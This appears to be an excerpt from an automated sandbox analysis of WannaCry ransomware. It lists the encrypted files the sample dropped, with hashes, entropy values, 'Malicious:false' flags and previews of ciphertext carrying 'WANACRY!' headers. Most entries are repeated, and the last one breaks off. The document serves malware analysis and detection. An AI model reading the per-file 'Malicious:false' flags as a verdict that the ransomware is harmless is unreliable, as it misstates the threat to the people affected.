                                                                              SHA1:FAFB9245DB743F8DC532BDEDD64AEC359D332A66
                                                                              SHA-256:112083B73038ACF5DBABC935FDF4CA3599B8DC560482DD328C20AB63D8F5CD86
                                                                              SHA-512:EA4EB6D312742ED809F592353DBD6633A988C01021EE3365E734E22A9B106796E68A4BB2477D1A7DD78E4691A2B8EAA0D9911CD7BED3D7077E4EC171C7C8A846
                                                                              Malicious:false
                                                                              Preview:WANACRY!.............3~..T.'....Q.f....>d....;e.1...6.O2..bb ......x;.*.3.nk.W..mi.(..^...e...Z.KK..8..?..A89rU......d>..m....h..[...s{w........W7.l'.0...}Gg...,o.....U.Y..4.xD./..k...%3^..q..8L9. .....K..0...r.................#".......2..S..J.om-.6...@g................#.Z.[.M........V...........k?..G=B.[.F..8..{V.w9.b.....%.A..D...?E....8..?...m?..-^h..8`)9...........XV...'..Y.,.Yx1...4..p..j.S...1g+.r%.A.+`.Q.bb+..}w.T.....n..."J?&.H...../.......).'.........k..sj^.O...y]....~.....M.W<q]...>.+....".j..t.qD%..|. ..Bzb...fi",(..nz.lV....D....V......Q.U.^..i..H....w...w...}..'.$.1...v..\.SP..rvg........~./...5.J...#..U...K......%..d.N.......U*.....h.0.....2.:o....r..!..,...........oH;......:..P<..GoWER...P.(ad.L'.T_.i.!D.q.5Eo4.w!.+....W...G.{/..Poa..r?...V_..fP.pP.......6...d..}.p./1.|...S.w......3...4.....8a..../l...e..Y,'.*..ch).:.j.Bv.I....|Qm1..:.V..G.p..8..m.A.,..R0. ....MoP.k..N^..Bu..o.s8.\...Iq. ..La5.....c...jy.u)H..jJo...}...[..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8673119543722
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkh1dNiud4ljXdnSC9WEiAVPnEdg1+vu0wlZnDeX4ZNt:bkhRf2N4AWEi+PEde+m0wHDeoZNt
                                                                              MD5:ECF55CA8E1EA62A280C3DDA27839BF52
                                                                              SHA1:80F3A0EFCEC0AA5C5382B2963AFF07BBF3F33BBB
                                                                              SHA-256:49F865227E3569968E35EDD68745975D454B54348564E05A7BE59E3D5885D8D9
                                                                              SHA-512:975B2993AA81CDAA507233FB5A4B1152C7234616A53DDA6E3AB8CF16703B2FA738348917C4D66ECD0BFC0EE20C3CFDBD2C398E1523CE6FED66EFDCD1318CE542
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....Va\Q)..t\B.y.k%....".,L.|..~1:p....y..g.w.]..........tN...9>.............>(...|.......'........<...^..'...a......<..{a3.d..7.S.q7 .{F.4.g^.jHOE]...?...G..&^../../.......nm...............T.z\v_h%'.7.s......&...xd.......$........7b.*>h.h..... U............NH/..$....k.{....&j.g..p..=.k.*.(...!D. 5'.RId..*`*...n...dS....<%.......ef2veN.....9..2....$.....3..YmS.....H..p...X..I(..a.T..A.N........-..`H..3g./.S.F..ig..ha..h.6.W.'o]!....\..R.V{=..|.#..g.N...G....i....9#...FWl.Y...2...1*_H.....=......x>.NB=..zF..../.M.h....j._.,.B)..."~f..[Vg......h......zo.,..Z7>.R.a...Z..A.,........4..s...OY.e9d,r....6...u..WW7p.6.l...n..z.}...U.a.. v.H.>nh..P..|......_J.....Vm0..xt..../..U.I......./..=Dv.?..M........K.8f&.=(.M.i.C.3f..K.t.Tm..w.Y.@......7...9..Nq...^...\L.fi.*..`..8........h8.:..0.........*=!........g..7X.e.k't....s..@.....m..Go.~.P/|S.U.?...M5.V.7yf&>...w?..`...z6..@]U3..].w9.@.....Q....=Xu...(.nV..3...!.?..`.6].y.t.k...X+.v......W9>....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8673119543722
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkh1dNiud4ljXdnSC9WEiAVPnEdg1+vu0wlZnDeX4ZNt:bkhRf2N4AWEi+PEde+m0wHDeoZNt
                                                                              MD5:ECF55CA8E1EA62A280C3DDA27839BF52
                                                                              SHA1:80F3A0EFCEC0AA5C5382B2963AFF07BBF3F33BBB
                                                                              SHA-256:49F865227E3569968E35EDD68745975D454B54348564E05A7BE59E3D5885D8D9
                                                                              SHA-512:975B2993AA81CDAA507233FB5A4B1152C7234616A53DDA6E3AB8CF16703B2FA738348917C4D66ECD0BFC0EE20C3CFDBD2C398E1523CE6FED66EFDCD1318CE542
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....Va\Q)..t\B.y.k%....".,L.|..~1:p....y..g.w.]..........tN...9>.............>(...|.......'........<...^..'...a......<..{a3.d..7.S.q7 .{F.4.g^.jHOE]...?...G..&^../../.......nm...............T.z\v_h%'.7.s......&...xd.......$........7b.*>h.h..... U............NH/..$....k.{....&j.g..p..=.k.*.(...!D. 5'.RId..*`*...n...dS....<%.......ef2veN.....9..2....$.....3..YmS.....H..p...X..I(..a.T..A.N........-..`H..3g./.S.F..ig..ha..h.6.W.'o]!....\..R.V{=..|.#..g.N...G....i....9#...FWl.Y...2...1*_H.....=......x>.NB=..zF..../.M.h....j._.,.B)..."~f..[Vg......h......zo.,..Z7>.R.a...Z..A.,........4..s...OY.e9d,r....6...u..WW7p.6.l...n..z.}...U.a.. v.H.>nh..P..|......_J.....Vm0..xt..../..U.I......./..=Dv.?..M........K.8f&.=(.M.i.C.3f..K.t.Tm..w.Y.@......7...9..Nq...^...\L.fi.*..`..8........h8.:..0.........*=!........g..7X.e.k't....s..@.....m..Go.~.P/|S.U.?...M5.V.7yf&>...w?..`...z6..@]U3..].w9.@.....Q....=Xu...(.nV..3...!.?..`.6].y.t.k...X+.v......W9>....
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.842741922265923
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkdThuHAjWxI/CnYBxuokjGUHfjdr7iMxJjAWowEkXE7:bkJhugRqYruDFxOWooK
                                                                              MD5:73CABA90CD94DC7F75C3B384DBEB2205
                                                                              SHA1:4319EFC1EDF7ECBA981B49C60D57EF45E21F37B5
                                                                              SHA-256:B84A2FA22D8B53C0AF87ED3712D401395437FF8D3D164D5F0F1C2D6856935C18
                                                                              SHA-512:3743CCBB2B23F22EA5557F14E2FB102AA135984D580BB58EA31DFE641223645E0CC902DD2446A326A426411616FCB67FBA7DDF5213F84AD99663424522D6C0C3
                                                                              Malicious:false
                                                                              Preview:WANACRY!.........$..-....F.I..-..jzB.........../...|U..r.uz.=.......Coi......9.0.j)..w.......bF..P..K.........Pk..Bq2.4.$.-=..S.3.'.sr..v......$B...!%.#.}........3....9K......0k..Rw..CE..iNg.5...k.A.H(........yf._,$@........T..}.`.7xo........KAOM.!.............B..`....."...u...f...'ka.*.s.....X...JN....)....u.Ob...o#.O.*w.6_........~.h\7.y..T.l....Di.^xf..RB....X..0..%%.U..k.v....W/.{..dA-.......-)...V...~....._.5..'5..]..R...........y.g<....r.z...N{.}pR....}!.],..D|.....nW1.b.....[.;r...C...h.B..4.A4c{(*.~....=j.....g.uF.6.]..2.s...t{...."..W=.k..Y....}.v...6R...f..+.F..C.e"...SI..p....<(Y/.Cil{.'..e.n...".F.Au....=.eR...sn2.-...;..FQ..;...-;w...w...l.q.......J....v.M....... i...NG....../.R:0.....-.. ...xa.5..C....3.......t>...E5v(+.....T...q...d.|..$.+#8.^.../......%.......N*......6FWq......9.0.iU.pF.."xb.=.G.lj.......z_.P7B.,.{...:.P}#{..@.$.K.|*...........T..A?.....r...j.......n..P.V.c../.'.H..1o.+@....z#?..ZC.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.842741922265923
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkdThuHAjWxI/CnYBxuokjGUHfjdr7iMxJjAWowEkXE7:bkJhugRqYruDFxOWooK
                                                                              MD5:73CABA90CD94DC7F75C3B384DBEB2205
                                                                              SHA1:4319EFC1EDF7ECBA981B49C60D57EF45E21F37B5
                                                                              SHA-256:B84A2FA22D8B53C0AF87ED3712D401395437FF8D3D164D5F0F1C2D6856935C18
                                                                              SHA-512:3743CCBB2B23F22EA5557F14E2FB102AA135984D580BB58EA31DFE641223645E0CC902DD2446A326A426411616FCB67FBA7DDF5213F84AD99663424522D6C0C3
                                                                              Malicious:false
                                                                              Preview:WANACRY!.........$..-....F.I..-..jzB.........../...|U..r.uz.=.......Coi......9.0.j)..w.......bF..P..K.........Pk..Bq2.4.$.-=..S.3.'.sr..v......$B...!%.#.}........3....9K......0k..Rw..CE..iNg.5...k.A.H(........yf._,$@........T..}.`.7xo........KAOM.!.............B..`....."...u...f...'ka.*.s.....X...JN....)....u.Ob...o#.O.*w.6_........~.h\7.y..T.l....Di.^xf..RB....X..0..%%.U..k.v....W/.{..dA-.......-)...V...~....._.5..'5..]..R...........y.g<....r.z...N{.}pR....}!.],..D|.....nW1.b.....[.;r...C...h.B..4.A4c{(*.~....=j.....g.uF.6.]..2.s...t{...."..W=.k..Y....}.v...6R...f..+.F..C.e"...SI..p....<(Y/.Cil{.'..e.n...".F.Au....=.eR...sn2.-...;..FQ..;...-;w...w...l.q.......J....v.M....... i...NG....../.R:0.....-.. ...xa.5..C....3.......t>...E5v(+.....T...q...d.|..$.+#8.^.../......%.......N*......6FWq......9.0.iU.pF.."xb.=.G.lj.......z_.P7B.,.{...:.P}#{..@.$.K.|*...........T..A?.....r...j.......n..P.V.c../.'.H..1o.+@....z#?..ZC.......
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8542758841465306
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkCLwIGn3L5MdWHJggcKgq/fGVrGlEGGW5YeiqcgCKe2/ozFw4TU:bkHWqJv7x/fGVVjWkNgcz7Q
                                                                              MD5:B122E165107E9EB75E30C6C8CEBF24A8
                                                                              SHA1:B8CBDE1E70DDFC2BAC4DE0535269894E166E1813
                                                                              SHA-256:80217DA5A4EE386D40FFC2286A1E8D6C604BD0762AF0E13F2A7ADA4300E6FF05
                                                                              SHA-512:47DB48D3E5186279F3BFF3B429786639DA9191C4A03C4F17CB1982CB332E794A7B4DFD76589428BEF7A2C818784506814ED1C93314EF24F5D267225D7F6D6817
                                                                              Malicious:false
                                                                              Preview:WANACRY!......8.Y.W.....;l..R%...k]N.a.V..vL1-./t.Uj....&[v#.....l.D+....u..u....8m......+.W.....K...iI*...m... .....,}.~.z5........L.;.....:.sC..\9.....?8.n._.x..ch....3A.1....>...:...a j`...b.s|.l....A3yF.9Q8..y...6...>....wG.!.........? .\.Jm..QG.......A...............-.....g.YN...z..*dw..s.ewJ.&.>8......$.s...g...~.*..).q"R..|.9..7]..W....L..+.;.=0.....5......0......D..MD.c..X..W..1.X.....aX......56....w....d..EH................wn..=.=..Mj]&k.H...R...{....F"....O.......8..*.o._..%xc...h.,.g.@e.9.....f.....kY..<V...A.......j.S....[Tu..o...;N"Q......Oj.7\!.M....N.YF..jk.34. ...=C.@..S.{R4..[.p.U....%...&..?...1.O>.....0.....j..T..9...,$..Gd.%P..E.......)0n..m....;5 i.&_+.i..pQ;.m...G!_..o.<.w.^....nI=..o..p.......%..j...v.|.. mJP<.y..Y.1TW..l..e.Mb.x.M%.bgK..)jT.'v~N>L.r.cb..].uvTo..M8....H.:.O..R.*cu.O.&wk..I../.g.....U=.........GL.b^..N..`...`.>.&..T9Him ..3]..h....L&.<...7N.....E.q.xM....{...X.t......7....)B.'n...m.n....`~...6-;...4.1.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8542758841465306
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkCLwIGn3L5MdWHJggcKgq/fGVrGlEGGW5YeiqcgCKe2/ozFw4TU:bkHWqJv7x/fGVVjWkNgcz7Q
                                                                              MD5:B122E165107E9EB75E30C6C8CEBF24A8
                                                                              SHA1:B8CBDE1E70DDFC2BAC4DE0535269894E166E1813
                                                                              SHA-256:80217DA5A4EE386D40FFC2286A1E8D6C604BD0762AF0E13F2A7ADA4300E6FF05
                                                                              SHA-512:47DB48D3E5186279F3BFF3B429786639DA9191C4A03C4F17CB1982CB332E794A7B4DFD76589428BEF7A2C818784506814ED1C93314EF24F5D267225D7F6D6817
                                                                              Malicious:false
                                                                              Preview:WANACRY!......8.Y.W.....;l..R%...k]N.a.V..vL1-./t.Uj....&[v#.....l.D+....u..u....8m......+.W.....K...iI*...m... .....,}.~.z5........L.;.....:.sC..\9.....?8.n._.x..ch....3A.1....>...:...a j`...b.s|.l....A3yF.9Q8..y...6...>....wG.!.........? .\.Jm..QG.......A...............-.....g.YN...z..*dw..s.ewJ.&.>8......$.s...g...~.*..).q"R..|.9..7]..W....L..+.;.=0.....5......0......D..MD.c..X..W..1.X.....aX......56....w....d..EH................wn..=.=..Mj]&k.H...R...{....F"....O.......8..*.o._..%xc...h.,.g.@e.9.....f.....kY..<V...A.......j.S....[Tu..o...;N"Q......Oj.7\!.M....N.YF..jk.34. ...=C.@..S.{R4..[.p.U....%...&..?...1.O>.....0.....j..T..9...,$..Gd.%P..E.......)0n..m....;5 i.&_+.i..pQ;.m...G!_..o.<.w.^....nI=..o..p.......%..j...v.|.. mJP<.y..Y.1TW..l..e.Mb.x.M%.bgK..)jT.'v~N>L.r.cb..].uvTo..M8....H.:.O..R.*cu.O.&wk..I../.g.....U=.........GL.b^..N..`...`.>.&..T9Him ..3]..h....L&.<...7N.....E.q.xM....{...X.t......7....)B.'n...m.n....`~...6-;...4.1.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852554486276614
                                                                              Encrypted:false
                                                                              SSDEEP:24:bki/xcxWb/9tJs9LGOdstDmGPMaSzlwXdfJzWSv0rxgG439QS02oWKpxv4N+rUHc:bk/W/6qZPMZz2XdfJiSMl43950nHx4NC
                                                                              MD5:5B929263C1C31BC14094FF3B2FC09872
                                                                              SHA1:6D13AF128131BB699FE665F942ED5B0E8B584FC1
                                                                              SHA-256:E05DF1D069D2272F29F85433236DBF3C08707DE4FD82FAE43F644F1A2EE063A4
                                                                              SHA-512:8AE5343B92B4D77B83CE252F135ECB1BBF3057B8A4C45A10A67A1CE35A48CFF81CF7C9C590A159ABEC90B76BD4BAB2FB350CBDFBF6FC39B9D77A74D621075A65
                                                                              Malicious:false
                                                                              Preview:WANACRY!......g....q$b+....!\v. ....J1j.<...[.6x.......,.0...$....o9..h.)..0t..~.....?Z.........j.p.tX.i..@.|;.[1.8hjkm{....?H.%..+_..e.PoT....._.......@....&,......r.)D^....B...v.5...zx.,..v.5B.j...5q2.Q..>.G..W.....*../\..f..sa.UJ:]..?.u+").=...`...F..S...................:.5.m.>......}..;%.`G.]....6~.).C"..Kv....)..u..g`\7,k../i.....%F...b..D....zA..3.0..t\.g......~f.V..D.r.x>(m.2...d<...XKK }b1...E.`&..YZ[...g...C...(.N.....i.)........:2.HON....6.m.....e.C_m....%.T..N..._......y..M.UF..u.3#Fx%...!V.W.M k..:.%...+r..9......X.,..2.Bc.$........0.m0..K|..X.W{.....C`....2..~~.B...e..%..5.x..$..=....MBj....'...XG.1u...T..0&{......Y../hD...M.l>.i.."..d..!u.....t..<...M.V!'Vy.:..x-...Zw.^..9.5..B.l*@s.s.%./[hE...;....,Y.P..Y..u....L[.v.H.t...(Fg.O.G.D.........1..C0..^.t...RY}....{......ap|h.~......v..!.2Aw.......T5.....I...r@...G..Y...n.....b........f....P;...wb..6.r..-..!v.........6.:..i...Z..cU,/........q..\.=........?.pV8J.Fs...tn_....n.v.\]
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.852554486276614
                                                                              Encrypted:false
                                                                              SSDEEP:24:bki/xcxWb/9tJs9LGOdstDmGPMaSzlwXdfJzWSv0rxgG439QS02oWKpxv4N+rUHc:bk/W/6qZPMZz2XdfJiSMl43950nHx4NC
                                                                              MD5:5B929263C1C31BC14094FF3B2FC09872
                                                                              SHA1:6D13AF128131BB699FE665F942ED5B0E8B584FC1
                                                                              SHA-256:E05DF1D069D2272F29F85433236DBF3C08707DE4FD82FAE43F644F1A2EE063A4
                                                                              SHA-512:8AE5343B92B4D77B83CE252F135ECB1BBF3057B8A4C45A10A67A1CE35A48CFF81CF7C9C590A159ABEC90B76BD4BAB2FB350CBDFBF6FC39B9D77A74D621075A65
                                                                              Malicious:false
                                                                              Preview:WANACRY!......g....q$b+....!\v. ....J1j.<...[.6x.......,.0...$....o9..h.)..0t..~.....?Z.........j.p.tX.i..@.|;.[1.8hjkm{....?H.%..+_..e.PoT....._.......@....&,......r.)D^....B...v.5...zx.,..v.5B.j...5q2.Q..>.G..W.....*../\..f..sa.UJ:]..?.u+").=...`...F..S...................:.5.m.>......}..;%.`G.]....6~.).C"..Kv....)..u..g`\7,k../i.....%F...b..D....zA..3.0..t\.g......~f.V..D.r.x>(m.2...d<...XKK }b1...E.`&..YZ[...g...C...(.N.....i.)........:2.HON....6.m.....e.C_m....%.T..N..._......y..M.UF..u.3#Fx%...!V.W.M k..:.%...+r..9......X.,..2.Bc.$........0.m0..K|..X.W{.....C`....2..~~.B...e..%..5.x..$..=....MBj....'...XG.1u...T..0&{......Y../hD...M.l>.i.."..d..!u.....t..<...M.V!'Vy.:..x-...Zw.^..9.5..B.l*@s.s.%./[hE...;....,Y.P..Y..u....L[.v.H.t...(Fg.O.G.D.........1..C0..^.t...RY}....{......ap|h.~......v..!.2Aw.......T5.....I...r@...G..Y...n.....b........f....P;...wb..6.r..-..!v.........6.:..i...Z..cU,/........q..\.=........?.pV8J.Fs...tn_....n.v.\]
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841335310866959
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk3NucfvWTl/JkyvF/FafxpwYzKvC52/2ublzC8aLdH174kUHRe:bknXWh/JkUsfUYzy/2Ez0vUs
                                                                              MD5:2EA6C10C740CB2173B3485C42D656581
                                                                              SHA1:740F2AF915CD6F075973B1BCC4C3C85F935C1239
                                                                              SHA-256:584DD9C6339C05472D36B2ED7CD911411E26CBC0B39A81504CBCEB9FB12A8CB7
                                                                              SHA-512:129778FDC59927D5690421144DD646DB4AC2BB9BF164301BD370D2F908D666D1EA9CDCA49D1F386AA8C703B29140585A609DE3AC2E8C940AC643CC9C0662E8F9
                                                                              Malicious:false
                                                                              Preview:WANACRY!......7.Hi...q=L.I....SVG.t`...&[..g.pg.?...z._...-!.|....../.M.."..x...`}.Q...b......\..3...&..qK.C...DA...ADce9A^....r...=4..b......gm5..}.n.!.;0..C.r.{..p2.kJ".....\._HA.o(...7...g.R...k...[J.y....E1....5...*..j$..a.`j..8.....Kcx.C..t.NWA.;...E.............../s.......?... .8Q..L./..Ir...,.......T..p...6E..@x%.......DRkQ..>..J.....,..P.ju}"...L.?.0..h..}w.fx.2...O&...F.B..?......NBm'R<.B@.<q.&..A...`.H.. u..l.b.\.....n..{YX..o...c.E_...b.{T..`*.S.u.,A..i.....T...L...O,1bw..S.....q%...k.........Wu.xa..P`..-.B.fnt!..@n..JO"]3U8".V."..|.......L....W...3....uy'..m=.?%.WU...........;JGA.;........pNZ.WY..3.I8.W...h..0kfhn$...b-...*...Y.J.Nj.#_.fC?.SzI.....E.-m..]g..\..4..d.....b..._.w;.Au.I.$..P\..;.p..<..t.......x/7..o.vC&Q.G.s.3h!..... .Ba.....u..B..V1N..y..z.......q2..?..|..ZI..@....}.)..%..._S;{xG.).r....:.....HH6.3..U9.Ph.%....%...N..C.bs..!..?n.[....VP..s6&c.....(...d..J.I.8..S4..i..@....bZ.{.xs.B....Dx.&...7.o....Q....?.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841335310866959
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk3NucfvWTl/JkyvF/FafxpwYzKvC52/2ublzC8aLdH174kUHRe:bknXWh/JkUsfUYzy/2Ez0vUs
                                                                              MD5:2EA6C10C740CB2173B3485C42D656581
                                                                              SHA1:740F2AF915CD6F075973B1BCC4C3C85F935C1239
                                                                              SHA-256:584DD9C6339C05472D36B2ED7CD911411E26CBC0B39A81504CBCEB9FB12A8CB7
                                                                              SHA-512:129778FDC59927D5690421144DD646DB4AC2BB9BF164301BD370D2F908D666D1EA9CDCA49D1F386AA8C703B29140585A609DE3AC2E8C940AC643CC9C0662E8F9
                                                                              Malicious:false
                                                                              Preview:WANACRY!......7.Hi...q=L.I....SVG.t`...&[..g.pg.?...z._...-!.|....../.M.."..x...`}.Q...b......\..3...&..qK.C...DA...ADce9A^....r...=4..b......gm5..}.n.!.;0..C.r.{..p2.kJ".....\._HA.o(...7...g.R...k...[J.y....E1....5...*..j$..a.`j..8.....Kcx.C..t.NWA.;...E.............../s.......?... .8Q..L./..Ir...,.......T..p...6E..@x%.......DRkQ..>..J.....,..P.ju}"...L.?.0..h..}w.fx.2...O&...F.B..?......NBm'R<.B@.<q.&..A...`.H.. u..l.b.\.....n..{YX..o...c.E_...b.{T..`*.S.u.,A..i.....T...L...O,1bw..S.....q%...k.........Wu.xa..P`..-.B.fnt!..@n..JO"]3U8".V."..|.......L....W...3....uy'..m=.?%.WU...........;JGA.;........pNZ.WY..3.I8.W...h..0kfhn$...b-...*...Y.J.Nj.#_.fC?.SzI.....E.-m..]g..\..4..d.....b..._.w;.Au.I.$..P\..;.p..<..t.......x/7..o.vC&Q.G.s.3h!..... .Ba.....u..B..V1N..y..z.......q2..?..|..ZI..@....}.)..%..._S;{xG.).r....:.....HH6.3..U9.Ph.%....%...N..C.bs..!..?n.[....VP..s6&c.....(...d..J.I.8..S4..i..@....bZ.{.xs.B....Dx.&...7.o....Q....?.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841994051634387
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkgzY5ignwyPOgKLaS0vm8UoR/iq95VPa9548C7FL+NgbuOfBN0rtoJ9hb:bkgzvgnugKWHOcqqXR+5UzqOpNWo
                                                                              MD5:C5B2F5A6EE4C1D4DBED09F68C243824D
                                                                              SHA1:336362540A538974CB3922F1AC5063F11886D690
                                                                              SHA-256:AF65A807488EDF436AC4743D9623B98328ACF5A95EE0500BB2ACEFA803BC91E9
                                                                              SHA-512:3E9964806413F251ECBA0FA802F6D5E0F6BA8836592687C953BE028A7C939FEEC06730D4B9EF11CA91EBC46977F28104229FC1B11770CF5F32FC2AD3C8E80241
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....s..7O6_....b89c.'.8.$...|.....Z..#.u.h....<......z.^}.D.........i+....'......]/.....m...{/X..K|.w.&..a..r.j./}...m.t.&.@}...&Q2)pg.ej..Mq..-L..(IP*m.l...$.N....)]<.wa&.4.<.5......ih<)+..H|...~.*V.[E.F....R.uJbu.Q.p....4Z.<..k./...eqS..........n.............`..m.J....6...1..$0..%j.X...~...8..'U..xX..K...."5.w.....q...B...3..K.:Z..B>..7...9i.....HP..i....>.}....h.cJ.....G......77.~e.K..>.v...:kc....Kv/#_xK.{..:.....o..@..).|._..]....$,.............XX.Z/..f..$..N.............B..Z...`.T..Nz.g..j..Q..*.....;P.4.)..........x.4S......r..14....^...Rnq'G....]`..w)..rN5...D.........0.J....rWji.. L..G....{.Hs..HJ..GyS..bA.,3%..\...:....cO...4S?..[7Q.TgzI+..~)&..$.....F[.v..,..W...`.s.I].....b.#P..i...+.j=.?..Kd...Nv..m.....<t.u.-...]....uV).Y.2yh..k....u#..O......C....l,J.......~m.....$G5bBv..A.Mv.:qC.N.8^;......D......J....S..':.I.kH.>.p.X.\.oaZ.......26g.v16N..&"09:.Y.+D..Y.Qd.rR...u.(,....){N.H..s1KM..%a...FL.'a?....?.3..S9.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.841994051634387
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkgzY5ignwyPOgKLaS0vm8UoR/iq95VPa9548C7FL+NgbuOfBN0rtoJ9hb:bkgzvgnugKWHOcqqXR+5UzqOpNWo
                                                                              MD5:C5B2F5A6EE4C1D4DBED09F68C243824D
                                                                              SHA1:336362540A538974CB3922F1AC5063F11886D690
                                                                              SHA-256:AF65A807488EDF436AC4743D9623B98328ACF5A95EE0500BB2ACEFA803BC91E9
                                                                              SHA-512:3E9964806413F251ECBA0FA802F6D5E0F6BA8836592687C953BE028A7C939FEEC06730D4B9EF11CA91EBC46977F28104229FC1B11770CF5F32FC2AD3C8E80241
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....s..7O6_....b89c.'.8.$...|.....Z..#.u.h....<......z.^}.D.........i+....'......]/.....m...{/X..K|.w.&..a..r.j./}...m.t.&.@}...&Q2)pg.ej..Mq..-L..(IP*m.l...$.N....)]<.wa&.4.<.5......ih<)+..H|...~.*V.[E.F....R.uJbu.Q.p....4Z.<..k./...eqS..........n.............`..m.J....6...1..$0..%j.X...~...8..'U..xX..K...."5.w.....q...B...3..K.:Z..B>..7...9i.....HP..i....>.}....h.cJ.....G......77.~e.K..>.v...:kc....Kv/#_xK.{..:.....o..@..).|._..]....$,.............XX.Z/..f..$..N.............B..Z...`.T..Nz.g..j..Q..*.....;P.4.)..........x.4S......r..14....^...Rnq'G....]`..w)..rN5...D.........0.J....rWji.. L..G....{.Hs..HJ..GyS..bA.,3%..\...:....cO...4S?..[7Q.TgzI+..~)&..$.....F[.v..,..W...`.s.I].....b.#P..i...+.j=.?..Kd...Nv..m.....<t.u.-...]....uV).Y.2yh..k....u#..O......C....l,J.......~m.....$G5bBv..A.Mv.:qC.N.8^;......D......J....S..':.I.kH.>.p.X.\.oaZ.......26g.v16N..&"09:.Y.+D..Y.Qd.rR...u.(,....){N.H..s1KM..%a...FL.'a?....?.3..S9.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.829005924232076
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkmaA0/lO7amlIoLWlNPQufqEs73TF/v68w/Z0e+hcfHQTHUo:bkmaAeKlIoL0NPQqK3Tlv6/6e+aH2
                                                                              MD5:F7F9C86DFA5BBC554CE783CFBED17501
                                                                              SHA1:3100731AFBA040E4CF4AE0A5575AA01ACEFA6EB3
                                                                              SHA-256:2A07FBBB410FB0F5DD92118818B5EEC3F10DC700040F5B3F656637A39C140448
                                                                              SHA-512:4538F38BE4073BEC46BACA9AB25342C808E9CEF27422E6CA83A5E059653AA1CE74D8F0A1EDAA9875B8D0CBC26ADFACCDC718B8D95A281ADCE991FC392A41E9C9
                                                                              Malicious:false
                                                                              Preview:WANACRY!......TN.u.~...KP%o..o.....Z.J!l........O.....H.>.1..f.7...$......tg.......].h&....d....%.3..r...vI...Z.T....M..^.}.#...au..m..r-...k.&['l9..F....>N.7.Cn.}*..3'8`.J.&.f...-/.H..E}Z..?{...X.U..8.3....t......)......3..6..Ym:..c..h.|..z<...a.Y..............2.....m....-...R.wt.=..No~Y. Z5....L}..$...a./..n./c.[.Fy4MH]v../.w.!..EV..z..m.l..q....gxVt....)q..0T..CS;..bJ&.3L..?.*...8H.za..+...}.<....:.4..N......."...@...O.a.)._2....3.8.>.D.S...... sD.gv..P{...H.n......A^...\....*.M.gy].........*.M...8\......^...M.!...r...w....&L$}....2..iK.Pn....#.$..r>.-qf..(.@.Q..V....z.6V$.M.}c/N...S........2I.A^./(}..T.A.}N.P"....F(a..w....C.u. ^._......>.....Y.K...\...&=6.Z........P$..f:...../...).....4...{..#.....@b....o~.th..<d.....m$'....&U.*..a=.t.y3..5......b...M.........AeH7.........f.....|....U..b.:..s...U......tL......yC..M.R..~.VR...9.......!..|..>M..)y.p..^`*$h,G...BR.#q...m...5...BZ...!.F.....u .].~..>z...I..D..e....L..Uvy.Z'.(
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.829005924232076
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkmaA0/lO7amlIoLWlNPQufqEs73TF/v68w/Z0e+hcfHQTHUo:bkmaAeKlIoL0NPQqK3Tlv6/6e+aH2
                                                                              MD5:F7F9C86DFA5BBC554CE783CFBED17501
                                                                              SHA1:3100731AFBA040E4CF4AE0A5575AA01ACEFA6EB3
                                                                              SHA-256:2A07FBBB410FB0F5DD92118818B5EEC3F10DC700040F5B3F656637A39C140448
                                                                              SHA-512:4538F38BE4073BEC46BACA9AB25342C808E9CEF27422E6CA83A5E059653AA1CE74D8F0A1EDAA9875B8D0CBC26ADFACCDC718B8D95A281ADCE991FC392A41E9C9
                                                                              Malicious:false
